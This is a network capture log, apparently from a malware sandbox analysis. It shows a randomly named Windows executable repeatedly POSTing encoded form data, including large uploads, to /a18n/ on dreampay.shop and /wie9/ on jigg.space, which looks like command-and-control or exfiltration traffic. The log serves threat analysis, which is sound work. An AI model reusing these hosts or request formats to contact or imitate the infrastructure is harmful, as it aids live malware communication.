Nov 12, 2024 15:31:12.685394049 CET	548	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:31:12 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.11.20	49740	13.248.169.48	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:18.017143011 CET	750	OUT	POST /a18n/ HTTP/1.1 Host: www.dreampay.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.dreampay.shop Referer: http://www.dreampay.shop/a18n/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 4c 50 77 48 6b 49 66 50 4d 55 6c 61 54 38 41 75 72 4e 34 48 57 6e 4d 6b 78 36 4e 35 4a 74 32 55 32 67 33 47 63 76 55 43 68 49 75 48 50 32 37 51 6f 6b 63 4d 47 4c 38 58 50 45 64 70 69 58 35 77 5a 52 4a 49 6e 37 31 4b 4d 69 65 6e 6f 54 4a 65 36 61 48 72 74 75 46 43 63 75 4f 7a 61 77 56 30 38 66 35 78 44 53 41 65 4b 59 4f 33 64 79 4b 71 75 4c 55 30 51 4f 6d 76 6f 69 4a 41 36 66 78 61 45 30 2b 68 61 56 47 48 44 75 57 74 4a 57 30 42 4a 59 48 70 41 70 51 67 43 58 50 32 39 44 62 4b 49 68 58 70 79 48 30 44 6a 36 79 4c 41 32 4e 64 35 30 43 76 36 62 6b 44 37 54 52 68 55 45 2f 74 73 51 3d 3d Data Ascii: mRu=LPwHkIfPMUlaT8AurN4HWnMkx6N5Jt2U2g3GcvUChIuHP27QokcMGL8XPEdpiX5wZRJIn71KMienoTJe6aHrtuFCcuOzawV08f5xDSAeKYO3dyKquLU0QOmvoiJA6fxaE0+haVGHDuWtJW0BJYHpApQgCXP29DbKIhXpyH0Dj6yLA2Nd50Cv6bkD7TRhUE/tsQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.11.20	49741	13.248.169.48	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:20.691129923 CET	770	OUT	POST /a18n/ HTTP/1.1 Host: www.dreampay.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.dreampay.shop Referer: http://www.dreampay.shop/a18n/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 4c 50 77 48 6b 49 66 50 4d 55 6c 61 63 2f 59 75 6e 4b 55 48 65 6e 4d 6a 76 4b 4e 35 48 4e 32 51 32 67 7a 47 63 71 74 48 67 2b 47 48 49 55 54 51 72 6c 63 4d 42 4c 38 58 58 55 64 6f 6d 58 35 37 5a 52 30 39 6e 2b 56 4b 4d 6d 2b 6e 6f 58 4e 65 36 74 72 6f 72 2b 46 41 58 4f 4f 4c 56 51 56 30 38 66 35 78 44 53 45 30 4b 59 47 33 64 42 43 71 38 35 38 33 54 4f 6d 75 76 69 4a 41 72 50 77 52 45 30 2f 4d 61 58 2b 68 44 74 75 74 4a 55 73 42 48 71 6a 75 50 70 51 6d 47 58 50 6b 39 52 6e 47 50 51 76 64 33 52 34 2f 75 71 6d 72 46 67 41 48 6b 47 32 4c 35 49 34 78 2f 6a 6f 4a 57 47 2b 32 78 66 70 31 31 6b 35 58 45 68 56 4d 43 59 6d 4d 56 47 71 50 68 66 45 3d Data Ascii: mRu=LPwHkIfPMUlac/YunKUHenMjvKN5HN2Q2gzGcqtHg+GHIUTQrlcMBL8XXUdomX57ZR09n+VKMm+noXNe6tror+FAXOOLVQV08f5xDSE0KYG3dBCq8583TOmuviJArPwRE0/MaX+hDtutJUsBHqjuPpQmGXPk9RnGPQvd3R4/uqmrFgAHkG2L5I4x/joJWG+2xfp11k5XEhVMCYmMVGqPhfE=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.11.20	49742	13.248.169.48	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:23.361154079 CET	2578	OUT	POST /a18n/ HTTP/1.1 Host: www.dreampay.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.dreampay.shop Referer: http://www.dreampay.shop/a18n/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 4c 50 77 48 6b 49 66 50 4d 55 6c 61 63 2f 59 75 6e 4b 55 48 65 6e 4d 6a 76 4b 4e 35 48 4e 32 51 32 67 7a 47 63 71 74 48 67 2b 2b 48 50 6e 72 51 74 32 6b 4d 41 4c 38 58 4a 45 64 6c 6d 58 35 6d 5a 52 73 35 6e 2b 4a 38 4d 67 79 6e 70 79 5a 65 38 59 66 6f 69 2b 46 41 59 75 4f 77 61 77 56 62 38 66 70 4c 44 53 30 30 4b 59 47 33 64 48 6d 71 2f 72 55 33 56 4f 6d 76 6f 69 4a 4d 36 66 78 32 45 30 6d 35 61 58 37 63 43 63 4f 74 49 30 38 42 4b 35 48 75 47 70 51 6b 4c 33 4f 33 39 52 71 59 50 54 62 37 33 55 74 59 75 72 2b 72 4a 56 6c 44 37 47 2f 53 6d 6f 41 50 35 43 49 57 42 45 75 78 30 73 52 55 6c 6b 78 35 50 55 52 35 4e 49 6e 45 49 56 75 50 30 4b 2f 43 61 54 34 50 75 44 6b 4f 45 64 70 63 45 33 42 42 32 32 47 46 31 45 68 55 4d 6f 72 56 56 39 64 6e 6c 78 6f 38 70 50 43 6c 72 75 78 4b 6e 38 77 74 4a 56 33 73 5a 45 75 2b 4a 33 31 63 36 77 45 78 2b 2b 66 78 63 6a 48 4e 68 34 70 51 30 71 2b 56 44 57 51 2b 70 6b 75 2b 2b 74 4b 51 30 6f 63 38 52 4f 58 53 65 67 50 53 43 6b 68 63 68 78 5a 46 2b 6a 65 4c 6c 59 [TRUNCATED] Data Ascii: mRu=LPwHkIfPMUlac/YunKUHenMjvKN5HN2Q2gzGcqtHg++HPnrQt2kMAL8XJEdlmX5mZRs5n+J8MgynpyZe8Yfoi+FAYuOwawVb8fpLDS00KYG3dHmq/rU3VOmvoiJM6fx2E0m5aX7cCcOtI08BK5HuGpQkL3O39RqYPTb73UtYur+rJVlD7G/SmoAP5CIWBEux0sRUlkx5PUR5NInEIVuP0K/CaT4PuDkOEdpcE3BB22GF1EhUMorVV9dnlxo8pPClruxKn8wtJV3sZEu+J31c6wEx++fxcjHNh4pQ0q+VDWQ+pku++tKQ0oc8ROXSegPSCkhchxZF+jeLlYFkE314KeBwgTw1NOT5T9zvzkGlQroOUN3ee6cieFHT85YMug3OUfUXBDsHTYiAFmNOFFJpaLN9IFQTwRa340/W9jqIYy6SByu3X+B1tRKFLTsgYBEpIWsCT3KYGb4lTfQoJTXngHmasIPabPQn2oVQJll2H0XpS2ZCnPKxLtRB8YzFP3Sg5anPbjPKWktICB4ZbXL77MQB0m1aHQ3u6pOzdl2614XHW69H5WodGlOob2LHLJEHxvAaeOKgoNoVcRKvD0qYl48AGsJ+ophGGMDu5TMpqQ8WfCIdzImuiOutbdIsTZyyEJz4/Ubf2QU4zAp7W2tPE9vEXXWt2CrCzcJlAY/elsmlFi+/eK9LffHQDolwgDRpLVWL4Ceu4UEX79HSupVmO8yCPHtVIek16K3fmglkTJdOeC3Hs1cg5mxKxogXEuEIcaFwHq/JxrD0vE4QCZD894E08Z72nuqzTVI7ujItaurk63QB3FXwoNBEzODBML/l8pzliFibj1UfsmjqSSb1/58/rVEx7blWlH73tF9AO+F0RpHEkaTaAt4MEbz2tOzUGwewNxqjStgA1yF2COfjDkl0Kbi02fHhwNl5bq+vdC2oftE8IwOTD3qVwNvN0BbDBwMNQolnBTBm4zpzZC5fRlLCGOwjmQOLvZe2n61P3p2LJ6IU [TRUNCATED]
Nov 12, 2024 15:31:23.361177921 CET	1289	OUT	Data Raw: 75 53 44 71 73 71 78 38 6a 6f 68 56 56 37 73 69 57 56 66 58 42 39 37 2f 30 39 73 65 2b 4e 43 52 4e 67 6b 53 6e 55 55 33 57 75 62 68 76 44 59 77 4d 70 66 53 63 64 2f 34 69 79 6d 45 75 76 61 47 57 38 62 38 71 58 65 63 56 59 65 41 75 34 46 35 7a 37 Data Ascii: uSDqsqx8johVV7siWVfXB97/09se+NCRNgkSnUU3WubhvDYwMpfScd/4iymEuvaGW8b8qXecVYeAu4F5z7O3Q5JNLTuZlmkdjBDP5IIvq0iliDZsbfPsGzt+zXyF0rpTTB7NnInVeWyIRoc4ASl65MhSDdcPR70jxRAxL/Erg4HPSO9GaS1Z62TSqBMyfjJSrb+DBHqVLospLwDDIYK60w/Vj5AsNZldnQMBKvCTEGKjnbsZVEY
Nov 12, 2024 15:31:23.361257076 CET	4052	OUT	Data Raw: 6b 2f 53 39 4d 2f 4a 32 4e 57 34 69 51 35 48 70 6a 56 50 6e 7a 39 70 33 30 7a 53 4d 55 50 67 74 4e 4a 63 41 33 32 39 67 76 49 78 36 55 62 6f 73 54 46 55 74 75 46 4e 51 43 76 4c 36 69 64 6f 72 57 61 50 54 59 58 43 5a 72 46 6b 31 54 56 61 65 67 45 Data Ascii: k/S9M/J2NW4iQ5HpjVPnz9p30zSMUPgtNJcA329gvIx6UbosTFUtuFNQCvL6idorWaPTYXCZrFk1TVaegEHg80fjcCZORIMHwFh5PNsjA381OEwpztyzOZu6KrlfrDouU9tXpUEo8/2u9wkbUZd62JEzM1j1BG/SU8DWYxPEud5ZJxa2wmoyWcfGpGel8g4m04MbPlSgDb/Sqw6u6QXp2RRe77cV8spw9u19evyV8PIZTWpqgxf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.11.20	49743	13.248.169.48	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:26.033469915 CET	476	OUT	GET /a18n/?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM HTTP/1.1 Host: www.dreampay.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:31:26.173508883 CET	388	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 12 Nov 2024 14:31:26 GMT Content-Type: text/html Content-Length: 248 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 52 75 3d 47 4e 59 6e 6e 2b 2f 48 64 79 56 38 64 75 52 4d 71 74 63 79 58 6d 30 78 79 36 41 35 52 37 4f 50 30 67 33 71 51 73 78 6c 69 2b 72 63 49 57 54 31 34 7a 52 55 44 71 67 78 4e 52 41 7a 6f 6c 63 65 63 48 38 79 75 39 41 4b 4b 41 61 6b 34 53 64 53 79 5a 36 52 76 49 64 41 56 74 32 51 55 54 31 49 77 4e 6c 50 42 41 6f 43 64 38 43 78 58 68 66 38 75 75 59 72 56 4e 63 3d 26 55 4a 3d 37 48 31 58 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.11.20	49744	173.255.194.134	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:31.523771048 CET	741	OUT	POST /wie9/ HTTP/1.1 Host: www.jigg.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.jigg.space Referer: http://www.jigg.space/wie9/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 6f 4a 54 76 38 41 46 67 51 56 33 45 62 76 39 58 55 58 59 72 4b 59 77 33 76 4e 65 39 6d 31 52 42 71 6d 53 6c 6a 32 2b 4e 7a 52 57 49 31 33 71 31 64 4e 7a 2b 73 78 48 4a 78 65 73 66 76 4f 38 31 76 50 47 62 4f 4a 67 4e 42 6d 53 67 71 78 48 59 51 51 2f 73 32 74 50 52 76 74 74 59 4f 75 58 4b 7a 59 51 49 6e 6a 57 66 36 5a 2b 45 64 76 69 57 50 53 4a 4d 63 39 51 5a 57 31 58 41 67 66 31 6f 2f 43 4d 53 7a 5a 7a 56 59 4f 54 58 6f 49 30 66 77 31 68 66 67 48 47 70 71 71 46 74 73 71 34 73 39 56 48 38 47 46 77 30 69 6e 79 65 30 46 5a 72 6c 4c 4f 44 77 63 38 36 72 6c 71 68 57 2b 52 6f 6e 41 3d 3d Data Ascii: mRu=oJTv8AFgQV3Ebv9XUXYrKYw3vNe9m1RBqmSlj2+NzRWI13q1dNz+sxHJxesfvO81vPGbOJgNBmSgqxHYQQ/s2tPRvttYOuXKzYQInjWf6Z+EdviWPSJMc9QZW1XAgf1o/CMSzZzVYOTXoI0fw1hfgHGpqqFtsq4s9VH8GFw0inye0FZrlLODwc86rlqhW+RonA==
Nov 12, 2024 15:31:31.657979012 CET	759	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 12 Nov 2024 14:31:31 GMT content-type: text/html content-length: 577 x-fail-reason: Bad Actor connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 [TRUNCATED] Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.11.20	49745	173.255.194.134	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:34.188080072 CET	761	OUT	POST /wie9/ HTTP/1.1 Host: www.jigg.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.jigg.space Referer: http://www.jigg.space/wie9/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 6f 4a 54 76 38 41 46 67 51 56 33 45 62 4f 74 58 59 55 41 72 4d 34 77 30 78 64 65 39 73 56 52 2f 71 6d 4f 6c 6a 7a 47 64 7a 69 79 49 31 57 61 31 63 4d 7a 2b 67 52 48 4a 6c 4f 74 56 68 75 38 41 76 50 43 31 4f 49 63 4e 42 6d 47 67 71 7a 66 59 4d 33 4c 74 30 39 50 54 6a 4e 74 61 4b 75 58 4b 7a 59 51 49 6e 6a 43 35 36 66 57 45 63 66 53 57 50 7a 4a 50 41 74 51 65 66 56 58 41 78 50 31 30 2f 43 4e 46 7a 64 7a 7a 59 49 58 58 6f 4a 6b 66 77 6e 4a 63 7a 6e 47 76 30 61 45 46 39 71 68 65 38 52 50 42 4f 56 38 6b 36 69 36 6e 38 7a 55 78 34 35 36 6e 7a 50 67 49 76 56 54 4a 55 38 51 7a 36 4b 55 58 4c 5a 6e 6a 58 33 55 77 5a 32 49 54 79 7a 50 53 6d 6b 30 3d Data Ascii: mRu=oJTv8AFgQV3EbOtXYUArM4w0xde9sVR/qmOljzGdziyI1Wa1cMz+gRHJlOtVhu8AvPC1OIcNBmGgqzfYM3Lt09PTjNtaKuXKzYQInjC56fWEcfSWPzJPAtQefVXAxP10/CNFzdzzYIXXoJkfwnJcznGv0aEF9qhe8RPBOV8k6i6n8zUx456nzPgIvVTJU8Qz6KUXLZnjX3UwZ2ITyzPSmk0=
Nov 12, 2024 15:31:34.322832108 CET	299	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Tue, 12 Nov 2024 14:31:34 GMT content-type: application/octet-stream content-length: 110 content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6a 69 67 67 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 77 77 77 2e 6a 69 67 67 2e 73 70 61 63 65 3c 2f 68 31 3e 3c 70 3e 43 6f 6d 69 6e 67 20 73 6f 6f 6e 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>www.jigg.space</title></head><body><h1>www.jigg.space</h1><p>Coming soon.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.11.20	49746	173.255.194.134	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:36.856694937 CET	1289	OUT	POST /wie9/ HTTP/1.1 Host: www.jigg.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.jigg.space Referer: http://www.jigg.space/wie9/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 6f 4a 54 76 38 41 46 67 51 56 33 45 62 4f 74 58 59 55 41 72 4d 34 77 30 78 64 65 39 73 56 52 2f 71 6d 4f 6c 6a 7a 47 64 7a 69 36 49 31 41 4f 31 64 76 62 2b 68 52 48 4a 6d 4f 74 55 68 75 38 6e 76 4c 75 78 4f 49 51 37 42 6a 43 67 72 53 2f 59 63 46 6a 74 39 39 50 54 38 39 74 5a 4f 75 58 66 7a 59 41 45 6e 6a 53 35 36 66 57 45 63 63 4b 57 47 43 4a 50 43 74 51 5a 57 31 58 63 67 66 31 49 2f 43 46 56 7a 64 33 38 59 34 33 58 6f 6f 55 66 6a 69 56 63 77 48 47 74 31 61 45 64 39 71 64 46 38 52 37 33 4f 56 59 4b 36 6c 47 6e 2b 79 73 72 71 34 43 49 70 74 6f 34 6c 55 6e 44 44 71 51 4e 6c 36 34 50 4b 36 4c 44 57 42 49 6a 66 6b 59 6d 6e 78 36 56 6b 51 77 69 42 6e 35 70 59 72 76 39 6b 4c 52 77 52 74 50 44 54 73 68 54 4d 2b 30 5a 53 76 51 6c 52 2b 2b 39 4f 45 49 4a 35 6e 6a 59 55 2f 41 59 6c 73 47 48 71 64 52 44 53 37 46 4c 75 59 54 65 66 78 6e 47 4c 46 43 46 74 41 63 47 71 4d 72 42 32 39 4c 69 39 77 6f 66 62 67 66 41 68 56 31 56 5a 71 43 56 74 50 58 78 53 4d 66 72 66 6e 54 55 69 77 57 2f 4b 53 59 38 73 53 [TRUNCATED] Data Ascii: mRu=oJTv8AFgQV3EbOtXYUArM4w0xde9sVR/qmOljzGdzi6I1AO1dvb+hRHJmOtUhu8nvLuxOIQ7BjCgrS/YcFjt99PT89tZOuXfzYAEnjS56fWEccKWGCJPCtQZW1Xcgf1I/CFVzd38Y43XooUfjiVcwHGt1aEd9qdF8R73OVYK6lGn+ysrq4CIpto4lUnDDqQNl64PK6LDWBIjfkYmnx6VkQwiBn5pYrv9kLRwRtPDTshTM+0ZSvQlR++9OEIJ5njYU/AYlsGHqdRDS7FLuYTefxnGLFCFtAcGqMrB29Li9wofbgfAhV1VZqCVtPXxSMfrfnTUiwW/KSY8sS+bavf1nRI6nnwmCZ8O21H98NH7aWSUIgttjdgpC74RtdWCUp4SX3PFRfuPMU0UiVKYMqRWsYGcE5h3NKudijqnEAeHarxFvBUyg/tTGtM3EiQSGbcs/vglAXC/KVh1Z7rNYe7iSfE4tzuMJukzTU2vB5gfwKTeF8ziV7WlgQsT1EA1iTi36jhXgH+xW57zht8CB4oLZ1YNkEQB96oM1AuOuaenFrgp8ZBODnyTzvr/mcm6p+R2yJLmDA9agzw/5vZQ3ywpgeH7SCVO9MtK1oZ6toYjGhqdf2dpman3ky8eNsUmf+18EfR2v9DHfMOkJ/dYCbhxK+/MteWLvyqfqEnZWj1mzTR8fW/ihqIr6qTveVQ4dIJs/OazHCkzgmPZ2qZcfwBAQijyllvfOeerPg/xph+
Nov 12, 2024 15:31:36.856755018 CET	6621	OUT	Data Raw: 4b 46 43 6b 32 59 45 47 37 30 35 65 42 62 32 6b 38 68 6f 48 6e 51 4c 50 35 6c 72 70 44 77 54 77 4a 50 31 33 56 66 67 58 55 76 37 6f 4a 67 41 50 67 76 75 38 39 46 70 77 6b 65 43 36 35 75 49 2f 4f 49 72 55 49 61 42 54 4c 72 4a 71 31 32 75 43 2f 72 Data Ascii: KFCk2YEG705eBb2k8hoHnQLP5lrpDwTwJP13VfgXUv7oJgAPgvu89FpwkeC65uI/OIrUIaBTLrJq12uC/rzzuebVSL01k/7wIqwYS4Xxil7zfPuJAatd2DoQue0S9qFtp4qc/ItkY+m2gRHnMSDz9cXGfTgRoE3Jg64iDuD7xkc5ausWENONx9t3e3IOFzETsG+lbqultLZ9WyraLbwSg4AEubIF9C+9b8t9Pi3dYXBbzSu+gRg
Nov 12, 2024 15:31:36.991569042 CET	759	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 12 Nov 2024 14:31:36 GMT content-type: text/html content-length: 577 x-fail-reason: Bad Actor connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 